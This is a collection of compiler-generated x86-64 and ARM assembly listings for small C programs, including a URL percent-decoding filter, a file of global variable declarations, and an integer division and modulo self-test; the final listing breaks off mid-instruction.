.file "663907.c" .intel_syntax noprefix .text .type dehex, @function dehex: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, edi mov BYTE PTR -4[rbp], al cmp BYTE PTR -4[rbp], 47 jle .L2 cmp BYTE PTR -4[rbp], 57 jg .L2 movsx eax, BYTE PTR -4[rbp] sub eax, 48 jmp .L3 .L2: cmp BYTE PTR -4[rbp], 64 jle .L4 cmp BYTE PTR -4[rbp], 70 jg .L4 movsx eax, BYTE PTR -4[rbp] sub eax, 55 jmp .L3 .L4: cmp BYTE PTR -4[rbp], 96 jle .L5 cmp BYTE PTR -4[rbp], 102 jg .L5 movsx eax, BYTE PTR -4[rbp] sub eax, 87 jmp .L3 .L5: mov eax, -1 .L3: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size dehex, .-dehex .section .rodata .LC0: .string "error\n" .text .type die, @function die: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov edx, 6 lea rsi, .LC0[rip] mov edi, 2 call write@PLT cmp rax, -1 jne .L7 mov edi, 2 call _exit@PLT .L7: mov edi, 1 call _exit@PLT .cfi_endproc .LFE1: .size die, .-die .globl main .type main, @function main: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 4096 or QWORD PTR [rsp], 0 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax jmp .L9 .L16: mov DWORD PTR -4124[rbp], 0 mov eax, DWORD PTR -4124[rbp] mov DWORD PTR -4128[rbp], eax jmp .L10 .L15: mov eax, DWORD PTR -4128[rbp] cdqe movzx eax, BYTE PTR -4112[rbp+rax] cmp al, 37 jne .L11 add DWORD PTR -4128[rbp], 1 mov eax, DWORD PTR -4128[rbp] cdqe movzx eax, BYTE PTR -4112[rbp+rax] movsx eax, al mov edi, eax call dehex mov DWORD PTR -4116[rbp], eax cmp DWORD PTR -4116[rbp], -1 jne .L12 call die .L12: mov eax, DWORD PTR -4116[rbp] sal eax, 4 mov edx, eax mov eax, DWORD PTR -4124[rbp] cdqe mov BYTE PTR -4112[rbp+rax], dl add DWORD PTR -4128[rbp], 1 mov eax, DWORD PTR -4128[rbp] cdqe movzx eax, BYTE PTR -4112[rbp+rax] movsx eax, al mov edi, eax call dehex mov DWORD PTR -4116[rbp], eax cmp DWORD PTR -4116[rbp], -1 jne .L13 call die .L13: mov eax, DWORD PTR -4124[rbp] cdqe movzx eax, BYTE PTR -4112[rbp+rax] mov edx, eax mov eax, DWORD PTR -4116[rbp] add eax, edx mov edx, eax mov eax, DWORD PTR -4124[rbp] cdqe mov BYTE PTR -4112[rbp+rax], dl jmp .L14 .L11: mov eax, DWORD PTR -4128[rbp] cmp eax, DWORD PTR -4124[rbp] je .L14 mov eax, DWORD PTR -4128[rbp] cdqe movzx edx, BYTE PTR -4112[rbp+rax] mov eax, DWORD PTR -4124[rbp] cdqe mov BYTE PTR -4112[rbp+rax], dl .L14: add DWORD PTR -4128[rbp], 1 add DWORD PTR -4124[rbp], 1 .L10: mov eax, DWORD PTR -4128[rbp] cmp eax, DWORD PTR -4120[rbp] jl .L15 mov eax, DWORD PTR -4124[rbp] movsx rdx, eax lea rax, -4112[rbp] mov rsi, rax mov edi, 1 call write@PLT cmp rax, -1 jne .L9 call die .L9: lea rax, -4112[rbp] mov edx, 4096 mov rsi, rax mov edi, 0 call read@PLT mov DWORD PTR -4120[rbp], eax cmp DWORD PTR -4120[rbp], 0 jg .L16 cmp DWORD PTR -4120[rbp], -1 jne .L17 call die .L17: mov edi, 0 call _exit@PLT .cfi_endproc .LFE2: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "663907.c" .text .align 2 .syntax unified .arm .fpu softvfp .type dehex, %function dehex: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 mov r3, r0 strb r3, [fp, #-5] ldrb r3, [fp, #-5] @ zero_extendqisi2 cmp r3, #47 bls .L2 ldrb r3, [fp, #-5] @ zero_extendqisi2 cmp r3, #57 bhi .L2 ldrb r3, [fp, #-5] @ zero_extendqisi2 sub r3, r3, #48 b .L3 .L2: ldrb r3, [fp, #-5] @ zero_extendqisi2 cmp r3, #64 bls .L4 ldrb r3, [fp, #-5] @ zero_extendqisi2 cmp r3, #70 bhi .L4 ldrb r3, [fp, #-5] @ zero_extendqisi2 sub r3, r3, #55 b .L3 .L4: ldrb r3, [fp, #-5] @ zero_extendqisi2 cmp r3, #96 bls .L5 ldrb r3, [fp, #-5] @ zero_extendqisi2 cmp r3, #102 bhi .L5 ldrb r3, [fp, #-5] @ zero_extendqisi2 sub r3, r3, #87 b .L3 .L5: mvn r3, #0 .L3: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size dehex, .-dehex .section .rodata .align 2 .LC0: .ascii "error\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type die, %function die: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 mov r2, #6 ldr r1, .L8 mov r0, #2 bl write mov r3, r0 cmn r3, #1 bne .L7 mov r0, #2 bl _exit .L7: mov r0, #1 bl _exit .L9: .align 2 .L8: .word .LC0 .size die, .-die .section .rodata .align 2 .LC1: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 4120 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #4096 sub sp, sp, #28 ldr r3, .L21 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 b .L11 .L18: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 mov r3, #0 str r3, [r2, #-16] sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-16] str r3, [r2, #-20] b .L12 .L17: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r2, r3 sub r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #37 bne .L13 sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r3, #1 str r3, [r2, #-20] sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r2, r3 sub r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 sub r2, fp, #4096 sub r2, r2, #12 mov r4, r2 mov r0, r3 bl dehex str r0, [r4, #-8] sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-8] cmn r3, #1 bne .L14 bl die .L14: sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-8] and r3, r3, #255 lsl r3, r3, #4 and r2, r3, #255 sub r3, fp, #4096 sub r3, r3, #12 mov r1, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-16] add r3, r1, r3 sub r3, r3, #4 strb r2, [r3] sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r3, #1 str r3, [r2, #-20] sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r2, r3 sub r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 sub r2, fp, #4096 sub r2, r2, #12 mov r4, r2 mov r0, r3 bl dehex str r0, [r4, #-8] sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-8] cmn r3, #1 bne .L15 bl die .L15: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-16] add r3, r2, r3 sub r3, r3, #4 ldrb r2, [r3] @ zero_extendqisi2 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-8] and r3, r3, #255 add r3, r2, r3 and r2, r3, #255 sub r3, fp, #4096 sub r3, r3, #12 mov r1, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-16] add r3, r1, r3 sub r3, r3, #4 strb r2, [r3] b .L16 .L13: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r2, [r2, #-20] ldr r3, [r3, #-16] cmp r2, r3 beq .L16 sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r2, r3 sub r3, r3, #4 ldrb r2, [r3] @ zero_extendqisi2 sub r3, fp, #4096 sub r3, r3, #12 mov r1, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-16] add r3, r1, r3 sub r3, r3, #4 strb r2, [r3] .L16: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-20] add r3, r3, #1 str r3, [r2, #-20] sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-16] add r3, r3, #1 str r3, [r2, #-16] .L12: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r2, [r2, #-20] ldr r3, [r3, #-12] cmp r2, r3 blt .L17 sub r3, fp, #4096 sub r3, r3, #12 ldr r2, [r3, #-16] sub r3, fp, #4096 sub r3, r3, #12 sub r3, r3, #4 mov r1, r3 mov r0, #1 bl write mov r3, r0 cmn r3, #1 bne .L11 bl die .L11: sub r3, fp, #4096 sub r3, r3, #12 mov r4, r3 sub r3, fp, #4096 sub r3, r3, #12 sub r3, r3, #4 mov r2, #4096 mov r1, r3 mov r0, #0 bl read str r0, [r4, #-12] sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-12] cmp r3, #0 bgt .L18 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-12] cmn r3, #1 bne .L19 bl die .L19: mov r0, #0 bl _exit .L22: .align 2 .L21: .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "472495.c" .intel_syntax noprefix .text .globl X .bss .align 4 .type X, @object .size X, 4 X: .zero 4 .globl a .align 4 .type a, @object .size a, 4 a: .zero 4 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "472495.c" .text .comm X,4,4 .global a .bss .align 2 .type a, %object .size a, 4 a: .space 4 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "818123.c" .intel_syntax noprefix .text .globl simple_rand .type simple_rand, @function simple_rand: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR seed.0[rip] imul rax, rax, 1103515245 add rax, 12345 mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov QWORD PTR seed.0[rip], rax mov rax, QWORD PTR -8[rbp] shr rax, 8 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size simple_rand, .-simple_rand .globl random_bitstring .type random_bitstring, @function random_bitstring: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -24[rbp], 0 mov QWORD PTR -16[rbp], 0 .L8: mov eax, 0 call simple_rand mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] sar rax cqo shr rdx, 60 add rax, rdx and eax, 15 sub rax, rdx mov DWORD PTR -20[rbp], eax mov eax, DWORD PTR -20[rbp] add DWORD PTR -24[rbp], eax cmp DWORD PTR -20[rbp], 0 jne .L4 mov rax, QWORD PTR -16[rbp] jmp .L5 .L4: mov eax, DWORD PTR -20[rbp] mov ecx, eax sal QWORD PTR -16[rbp], cl mov rax, QWORD PTR -8[rbp] and eax, 1 test rax, rax je .L6 mov eax, DWORD PTR -20[rbp] mov edx, 1 mov ecx, eax sal edx, cl mov eax, edx sub eax, 1 cdqe or QWORD PTR -16[rbp], rax .L6: mov eax, DWORD PTR -24[rbp] cmp eax, 70 jbe .L8 mov rax, QWORD PTR -16[rbp] .L5: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size random_bitstring, .-random_bitstring .globl main .type main, @function main: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov QWORD PTR -88[rbp], 0 jmp .L10 .L37: mov eax, 0 call random_bitstring mov QWORD PTR -80[rbp], rax mov eax, 0 call random_bitstring mov QWORD PTR -72[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -64[rbp], rax mov rax, QWORD PTR -72[rbp] mov QWORD PTR -56[rbp], rax cmp QWORD PTR -56[rbp], 0 je .L38 mov rax, QWORD PTR -64[rbp] mov edx, 0 div QWORD PTR -56[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov edx, 0 div QWORD PTR -56[rbp] mov QWORD PTR -40[rbp], rdx mov rax, QWORD PTR -40[rbp] cmp rax, QWORD PTR -56[rbp] jnb .L13 mov rax, QWORD PTR -48[rbp] imul rax, QWORD PTR -56[rbp] mov rdx, rax mov rax, QWORD PTR -40[rbp] add rax, rdx cmp QWORD PTR -64[rbp], rax je .L14 .L13: call abort@PLT .L14: mov rax, QWORD PTR -80[rbp] mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -72[rbp] mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -32[rbp] add rax, rax test rax, rax jne .L15 cmp QWORD PTR -24[rbp], -1 je .L39 .L15: mov rax, QWORD PTR -32[rbp] cqo idiv QWORD PTR -24[rbp] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -32[rbp] cqo idiv QWORD PTR -24[rbp] mov QWORD PTR -8[rbp], rdx mov rax, QWORD PTR -8[rbp] cqo mov rax, rdx xor rax, QWORD PTR -8[rbp] sub rax, rdx mov rcx, rax mov rax, QWORD PTR -24[rbp] cqo mov rax, rdx xor rax, QWORD PTR -24[rbp] sub rax, rdx cmp rcx, rax jnb .L16 mov rax, QWORD PTR -16[rbp] imul rax, QWORD PTR -24[rbp] mov rdx, rax mov rax, QWORD PTR -8[rbp] add rax, rdx cmp QWORD PTR -32[rbp], rax je .L40 .L16: call abort@PLT .L40: nop .L17: mov rax, QWORD PTR -80[rbp] mov DWORD PTR -120[rbp], eax mov rax, QWORD PTR -72[rbp] mov DWORD PTR -116[rbp], eax cmp DWORD PTR -116[rbp], 0 je .L41 mov eax, DWORD PTR -120[rbp] mov edx, 0 div DWORD PTR -116[rbp] mov DWORD PTR -112[rbp], eax mov eax, DWORD PTR -120[rbp] mov edx, 0 div DWORD PTR -116[rbp] mov DWORD PTR -108[rbp], edx mov eax, DWORD PTR -108[rbp] cmp eax, DWORD PTR -116[rbp] jnb .L19 mov eax, DWORD PTR -112[rbp] imul eax, DWORD PTR -116[rbp] mov edx, eax mov eax, DWORD PTR -108[rbp] add eax, edx cmp DWORD PTR -120[rbp], eax je .L20 .L19: call abort@PLT .L20: mov rax, QWORD PTR -80[rbp] mov DWORD PTR -104[rbp], eax mov rax, QWORD PTR -72[rbp] mov DWORD PTR -100[rbp], eax mov eax, DWORD PTR -104[rbp] add eax, eax test eax, eax jne .L21 cmp DWORD PTR -100[rbp], -1 je .L42 .L21: mov eax, DWORD PTR -104[rbp] cdq idiv DWORD PTR -100[rbp] mov DWORD PTR -96[rbp], eax mov eax, DWORD PTR -104[rbp] cdq idiv DWORD PTR -100[rbp] mov DWORD PTR -92[rbp], edx mov eax, DWORD PTR -92[rbp] cdq mov eax, edx xor eax, DWORD PTR -92[rbp] sub eax, edx mov ecx, eax mov eax, DWORD PTR -100[rbp] cdq mov eax, edx xor eax, DWORD PTR -100[rbp] sub eax, edx cmp ecx, eax jnb .L22 mov eax, DWORD PTR -96[rbp] imul eax, DWORD PTR -100[rbp] mov edx, eax mov eax, DWORD PTR -92[rbp] add eax, edx cmp DWORD PTR -104[rbp], eax jne .L22 mov eax, DWORD PTR -104[rbp] shr eax, 31 mov edx, eax mov eax, DWORD PTR -92[rbp] shr eax, 31 xor eax, edx test al, al je .L23 cmp DWORD PTR -92[rbp], 0 je .L23 .L22: call abort@PLT .L23: mov rax, QWORD PTR -80[rbp] mov WORD PTR -136[rbp], ax mov rax, QWORD PTR -72[rbp] mov WORD PTR -134[rbp], ax cmp WORD PTR -134[rbp], 0 je .L43 movzx eax, WORD PTR -136[rbp] mov edx, 0 div WORD PTR -134[rbp] mov WORD PTR -132[rbp], ax movzx eax, WORD PTR -136[rbp] mov edx, 0 div WORD PTR -134[rbp] mov WORD PTR -130[rbp], dx movzx eax, WORD PTR -130[rbp] cmp ax, WORD PTR -134[rbp] jnb .L25 movzx edx, WORD PTR -132[rbp] movzx eax, WORD PTR -134[rbp] imul edx, eax movzx eax, WORD PTR -130[rbp] add edx, eax movzx eax, WORD PTR -136[rbp] cmp edx, eax je .L26 .L25: call abort@PLT .L26: mov rax, QWORD PTR -80[rbp] mov WORD PTR -128[rbp], ax mov rax, QWORD PTR -72[rbp] mov WORD PTR -126[rbp], ax movsx eax, WORD PTR -128[rbp] movsx esi, WORD PTR -126[rbp] cdq idiv esi mov WORD PTR -124[rbp], ax movsx eax, WORD PTR -128[rbp] movsx ecx, WORD PTR -126[rbp] cdq idiv ecx mov eax, edx mov WORD PTR -122[rbp], ax movzx eax, WORD PTR -122[rbp] sar ax, 15 mov edx, eax mov eax, edx xor ax, WORD PTR -122[rbp] sub eax, edx movzx edx, ax cmp WORD PTR -126[rbp], 0 jns .L27 movzx eax, WORD PTR -126[rbp] neg eax movzx eax, ax jmp .L28 .L27: movzx eax, WORD PTR -126[rbp] movzx eax, ax .L28: cmp eax, edx jle .L29 movzx edx, WORD PTR -124[rbp] movzx eax, WORD PTR -126[rbp] imul edx, eax movzx eax, WORD PTR -122[rbp] add eax, edx cmp WORD PTR -128[rbp], ax je .L30 .L29: call abort@PLT .L30: mov rax, QWORD PTR -80[rbp] mov BYTE PTR -144[rbp], al mov rax, QWORD PTR -72[rbp] mov BYTE PTR -143[rbp], al cmp BYTE PTR -143[rbp], 0 je .L44 movzx eax, BYTE PTR -144[rbp] movzx eax, al div BYTE PTR -143[rbp] mov BYTE PTR -142[rbp], al movzx eax, BYTE PTR -144[rbp] movzx eax, al div BYTE PTR -143[rbp] movzx eax, ah mov BYTE PTR -141[rbp], al movzx eax, BYTE PTR -141[rbp] cmp al, BYTE PTR -143[rbp] jnb .L32 movzx edx, BYTE PTR -142[rbp] movzx eax, BYTE PTR -143[rbp] imul edx, eax movzx eax, BYTE PTR -141[rbp] add edx, eax movzx eax, BYTE PTR -144[rbp] cmp edx, eax je .L33 .L32: call abort@PLT .L33: mov rax, QWORD PTR -80[rbp] mov BYTE PTR -140[rbp], al mov rax, QWORD PTR -72[rbp] mov BYTE PTR -139[rbp], al movsx eax, BYTE PTR -140[rbp] movsx edi, BYTE PTR -139[rbp] cdq idiv edi mov BYTE PTR -138[rbp], al movsx eax, BYTE PTR -140[rbp] movsx ecx, BYTE PTR -139[rbp] cdq idiv ecx mov eax, edx mov BYTE PTR -137[rbp], al movzx eax, BYTE PTR -137[rbp] sar al, 7 mov edx, eax mov eax, edx xor al, BYTE PTR -137[rbp] sub eax, edx movzx edx, al cmp BYTE PTR -139[rbp], 0 jns .L34 movzx eax, BYTE PTR -139[rbp] neg eax movzx eax, al jmp .L35 .L34: movzx eax, BYTE PTR -139[rbp] movzx eax, al .L35: cmp eax, edx jle .L36 movzx eax, BYTE PTR -138[rbp] movzx edx, BYTE PTR -139[rbp] imul eax, edx mov edx, eax movzx eax, BYTE PTR -137[rbp] add eax, edx cmp BYTE PTR -140[rbp], al je .L12 .L36: call abort@PLT .L38: nop jmp .L12 .L39: nop jmp .L12 .L41: nop jmp .L12 .L42: nop jmp .L12 .L43: nop jmp .L12 .L44: nop .L12: add QWORD PTR -88[rbp], 1 .L10: cmp QWORD PTR -88[rbp], 9999 jle .L37 mov edi, 0 call exit@PLT .cfi_endproc .LFE8: .size main, .-main .data .align 8 .type seed.0, @object .size seed.0, 8 seed.0: .quad 47114711 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "818123.c" .text .align 2 .global simple_rand .syntax unified .arm .fpu softvfp .type simple_rand, %function simple_rand: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #8 ldr r3, .L3 ldmia r3, {r0-r1} ldr r3, .L3+4 mul r2, r3, r1 mov r3, #0 mul r3, r0, r3 add ip, r2, r3 ldr lr, .L3+4 umull r2, r3, r0, lr add r1, ip, r3 mov r3, r1 ldr r0, .L3+8 mov r1, #0 adds r4, r2, r0 adc r5, r3, r1 str r4, [fp, #-20] str r5, [fp, #-16] ldr r1, .L3 sub r3, fp, #20 ldmia r3, {r2-r3} stm r1, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} mov r2, #0 mov r3, #0 lsr r2, r0, #8 orr r2, r2, r1, lsl #24 lsr r3, r1, #8 mov r0, r2 mov r1, r3 sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L4: .align 2 .L3: .word seed.4781 .word 1103515245 .word 12345 .size simple_rand, .-simple_rand .align 2 .global random_bitstring .syntax unified .arm .fpu softvfp .type random_bitstring, %function random_bitstring: @ args = 0, pretend = 0, frame = 64 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #64 mov r3, #0 str r3, [fp, #-52] mov r2, #0 mov r3, #0 str r2, [fp, #-44] str r3, [fp, #-40] .L10: bl simple_rand str r0, [fp, #-36] str r1, [fp, #-32] sub r3, fp, #36 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsr r0, r2, #1 orr r0, r0, r3, lsl #31 asr r1, r3, #1 asr r3, r1, #31 mov r2, r3 asr r3, r2, #31 eor ip, r0, r2 str ip, [fp, #-76] eor r1, r1, r3 str r1, [fp, #-72] sub r1, fp, #76 ldmia r1, {r0-r1} mov ip, r0 subs ip, ip, r2 str ip, [fp, #-60] sbc r1, r1, r3 str r1, [fp, #-56] mov r0, #15 mov r1, #0 ldr ip, [fp, #-60] and r8, ip, r0 ldr ip, [fp, #-56] and r9, ip, r1 eor r6, r8, r2 eor r7, r9, r3 subs r1, r6, r2 str r1, [fp, #-84] sbc r3, r7, r3 str r3, [fp, #-80] sub r3, fp, #84 ldmia r3, {r2-r3} mov r3, r2 str r3, [fp, #-48] ldr r2, [fp, #-52] ldr r3, [fp, #-48] add r3, r2, r3 str r3, [fp, #-52] ldr r3, [fp, #-48] cmp r3, #0 bne .L6 sub r3, fp, #44 ldmia r3, {r2-r3} b .L7 .L6: sub r3, fp, #44 ldmia r3, {r2-r3} ldr r1, [fp, #-48] sub ip, r1, #32 rsb r0, r1, #32 lsl r5, r3, r1 orr r5, r5, r2, lsl ip orr r5, r5, r2, lsr r0 lsl r4, r2, r1 str r4, [fp, #-44] str r5, [fp, #-40] sub r1, fp, #36 ldmia r1, {r0-r1} mov r2, #1 mov r3, #0 and ip, r0, r2 str ip, [fp, #-68] and r3, r1, r3 str r3, [fp, #-64] sub r3, fp, #68 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L8 mov r2, #1 ldr r3, [fp, #-48] lsl r3, r2, r3 sub r3, r3, #1 mov r0, r3 asr r1, r0, #31 sub r3, fp, #44 ldmia r3, {r2-r3} orr ip, r2, r0 str ip, [fp, #-92] orr r3, r3, r1 str r3, [fp, #-88] sub r3, fp, #92 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] .L8: ldr r3, [fp, #-52] cmp r3, #70 bls .L10 sub r3, fp, #44 ldmia r3, {r2-r3} .L7: mov r0, r2 mov r1, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .size random_bitstring, .-random_bitstring .global __aeabi_uldivmod .global __aeabi_ldivmod .global __aeabi_uidiv .global __aeabi_uidivmod .global __aeabi_idiv .global __aeabi_idivmod .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 176 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #176 mov r2, #0 mov r3, #0 str r2, [fp, #-116] str r3, [fp, #-112] b .L12 .L39: bl random_bitstring str r0, [fp, #-108] str r1, [fp, #-104] bl random_bitstring str r0, [fp, #-100] str r1, [fp, #-96] sub r3, fp, #108 ldmia r3, {r2-r3} str r2, [fp, #-92] str r3, [fp, #-88] sub r3, fp, #100 ldmia r3, {r2-r3} str r2, [fp, #-84] str r3, [fp, #-80] sub r3, fp, #84 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L40 sub r3, fp, #84 ldmia r3, {r2-r3} sub r1, fp, #92 ldmia r1, {r0-r1} bl __aeabi_uldivmod mov r2, r0 mov r3, r1 str r2, [fp, #-76] str r3, [fp, #-72] sub r1, fp, #92 ldmia r1, {r0-r1} sub r3, fp, #84 ldmia r3, {r2-r3} bl __aeabi_uldivmod str r2, [fp, #-68] str r3, [fp, #-64] sub r1, fp, #68 ldmia r1, {r0-r1} sub r3, fp, #84 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bcs .L15 ldr r3, [fp, #-72] ldr r2, [fp, #-84] mul r1, r2, r3 ldr r2, [fp, #-80] ldr r3, [fp, #-76] mul r3, r2, r3 add ip, r1, r3 ldr r2, [fp, #-76] ldr r3, [fp, #-84] umull r0, r1, r2, r3 add r3, ip, r1 mov r1, r3 sub r3, fp, #68 ldmia r3, {r2-r3} adds ip, r0, r2 str ip, [fp, #-180] adc r3, r1, r3 str r3, [fp, #-176] sub r3, fp, #92 ldmia r3, {r2-r3} sub r1, fp, #180 ldmia r1, {r0-r1} cmp r3, r1 cmpeq r2, r0 beq .L16 .L15: bl abort .L16: sub r3, fp, #108 ldmia r3, {r2-r3} str r2, [fp, #-60] str r3, [fp, #-56] sub r3, fp, #100 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] sub r3, fp, #60 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-196] adc r3, r3, r3 str r3, [fp, #-192] sub r3, fp, #196 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L17 sub r1, fp, #52 ldmia r1, {r0-r1} mvn r2, #0 mvn r3, #0 cmp r1, r3 cmpeq r0, r2 beq .L41 .L17: sub r3, fp, #52 ldmia r3, {r2-r3} sub r1, fp, #60 ldmia r1, {r0-r1} bl __aeabi_ldivmod mov r2, r0 mov r3, r1 str r2, [fp, #-44] str r3, [fp, #-40] sub r1, fp, #60 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} bl __aeabi_ldivmod str r2, [fp, #-36] str r3, [fp, #-32] sub r1, fp, #36 ldmia r1, {r0-r1} mov r2, #0 mov r3, #0 asr r2, r1, #31 asr r3, r1, #31 sub r1, fp, #36 ldmia r1, {r0-r1} eor r6, r2, r0 eor r7, r3, r1 subs r6, r6, r2 sbc r7, r7, r3 mov r4, r6 mov r5, r7 sub r3, fp, #52 ldmia r3, {r2-r3} mov r0, #0 mov 